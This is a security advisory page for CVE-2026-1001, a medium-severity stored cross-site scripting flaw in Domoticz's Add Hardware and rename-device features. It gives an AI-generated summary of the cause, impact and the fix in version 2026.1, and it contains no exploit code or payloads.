VYPR
← All advisories
Medium severity4.8NVD Advisory· Published Mar 25, 2026· Updated Apr 1, 2026

CVE-2026-1001

CVE-2026-1001

Description

Domoticz versions prior to 2026.1 contain a stored cross-site scripting vulnerability in the Add Hardware and rename device functionality of the web interface that allows authenticated administrators to execute arbitrary scripts by supplying crafted names containing script or HTML markup. Attackers can inject malicious code that is stored and rendered without proper output encoding, causing script execution in the browsers of users viewing the affected page and enabling unauthorized actions within their session context.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Domoticz versions prior to 2026.1 contain a stored XSS vulnerability allowing admin users to inject arbitrary scripts via crafted hardware or device names.

Overview

Domoticz versions prior to 2026.1 are affected by a stored cross-site scripting (XSS) vulnerability in the Add Hardware and rename device functionality of the web interface. The root cause is improper output encoding of user-supplied names, allowing script or HTML markup to be stored and later rendered in the browser of users viewing the affected page [1][2].

Exploitation

An authenticated administrator can supply crafted names containing malicious script or HTML markup when adding hardware or renaming a device. This stored payload is then executed in the browsers of other users (including administrators) who visit the affected pages. The attack requires authenticated access with administrative privileges, but does not require any special network position or additional authentication [2].

Impact

Successful exploitation enables an attacker to execute arbitrary scripts in the context of the victim's session, leading to unauthorized actions such as modifying system settings, exfiltrating sensitive data, or performing other actions within the victim's session context. The vulnerability is classified as medium severity with a CVSS v3 score of 4.8 [1].

Mitigation

The vulnerability is fixed in Domoticz version 2026.1, which was released on March 25, 2026. Users are advised to update immediately to the latest version to remediate the issue [1]. No workarounds are available for unpatched versions.

References
  1. Domoticz version 2026.1 Released - New Features & Highlights
  2. Domoticz < 2026.1 Stored XSS via Hardware Configuration Endpoint

AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Domoticz/Domoticz2 versions
    cpe:2.3:a:domoticz:domoticz:*:*:*:*:*:*:*:*+ 1 more
    • cpe:2.3:a:domoticz:domoticz:*:*:*:*:*:*:*:*range: <2026.1
    • (no CPE)range: <2026.1

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

2

News mentions

0

No linked articles in our index yet.